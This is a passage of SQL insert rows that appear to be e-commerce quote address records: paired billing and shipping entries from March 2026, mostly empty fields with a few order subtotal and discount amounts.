(838, 602, '2026-03-24 23:26:38', '2026-03-24 23:26:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(839, 602, '2026-03-24 23:26:38', '2026-03-24 23:26:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(840, 603, '2026-03-25 00:22:57', '2026-03-25 00:22:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(841, 603, '2026-03-25 00:22:57', '2026-03-25 00:22:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 643.0000, 643.0000, 514.4000, 514.4000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -128.6000, -128.6000, 514.4000, 514.4000, NULL, '[]', NULL, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(842, 604, '2026-03-25 03:29:59', '2026-03-25 03:29:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(843, 604, '2026-03-25 03:29:59', '2026-03-25 03:29:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(844, 605, '2026-03-25 04:45:12', '2026-03-25 04:45:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(845, 605, '2026-03-25 04:45:12', '2026-03-25 04:45:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(846, 606, '2026-03-25 04:45:39', '2026-03-25 04:45:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(847, 606, '2026-03-25 04:45:39', '2026-03-25 04:45:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(848, 607, '2026-03-25 04:45:42', '2026-03-25 04:45:42', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(849, 607, '2026-03-25 04:45:42', '2026-03-25 04:45:42', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(850, 608, '2026-03-25 04:45:45', '2026-03-25 04:45:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(851, 608, '2026-03-25 04:45:45', '2026-03-25 04:45:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(852, 609, '2026-03-25 04:45:48', '2026-03-25 04:45:48', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(853, 609, '2026-03-25 04:45:48', '2026-03-25 04:45:48', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(854, 610, '2026-03-25 04:45:51', '2026-03-25 04:45:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(855, 610, '2026-03-25 04:45:51', '2026-03-25 04:45:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(856, 611, '2026-03-25 04:45:54', '2026-03-25 04:45:54', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(857, 611, '2026-03-25 04:45:54', '2026-03-25 04:45:54', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(858, 612, '2026-03-25 04:45:57', '2026-03-25 04:45:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(859, 612, '2026-03-25 04:45:57', '2026-03-25 04:45:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(860, 613, '2026-03-25 04:46:00', '2026-03-25 04:46:00', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(861, 613, '2026-03-25 04:46:00', '2026-03-25 04:46:00', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(862, 614, '2026-03-25 04:46:03', '2026-03-25 04:46:03', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(863, 614, '2026-03-25 04:46:03', '2026-03-25 04:46:03', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(864, 615, '2026-03-25 04:46:06', '2026-03-25 04:46:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(865, 615, '2026-03-25 04:46:06', '2026-03-25 04:46:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(866, 616, '2026-03-25 04:46:10', '2026-03-25 04:46:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(867, 616, '2026-03-25 04:46:10', '2026-03-25 04:46:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(868, 617, '2026-03-25 04:46:13', '2026-03-25 04:46:13', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(869, 617, '2026-03-25 04:46:13', '2026-03-25 04:46:13', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(870, 618, '2026-03-25 04:46:16', '2026-03-25 04:46:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(871, 618, '2026-03-25 04:46:16', '2026-03-25 04:46:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(872, 619, '2026-03-25 04:46:26', '2026-03-25 04:46:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(873, 619, '2026-03-25 04:46:26', '2026-03-25 04:46:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(874, 620, '2026-03-25 07:27:24', '2026-03-25 07:27:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(875, 620, '2026-03-25 07:27:24', '2026-03-25 07:27:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(876, 621, '2026-03-25 11:36:14', '2026-03-25 11:36:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(877, 621, '2026-03-25 11:36:14', '2026-03-25 11:36:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(878, 622, '2026-03-25 15:42:17', '2026-03-25 15:42:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(879, 622, '2026-03-25 15:42:17', '2026-03-25 15:42:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(880, 623, '2026-03-25 19:53:17', '2026-03-25 19:53:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(881, 623, '2026-03-25 19:53:17', '2026-03-25 19:53:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(882, 624, '2026-03-25 20:46:46', '2026-03-25 20:46:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(883, 624, '2026-03-25 20:46:46', '2026-03-25 20:46:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(884, 625, '2026-03-25 20:54:32', '2026-03-25 20:54:32', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
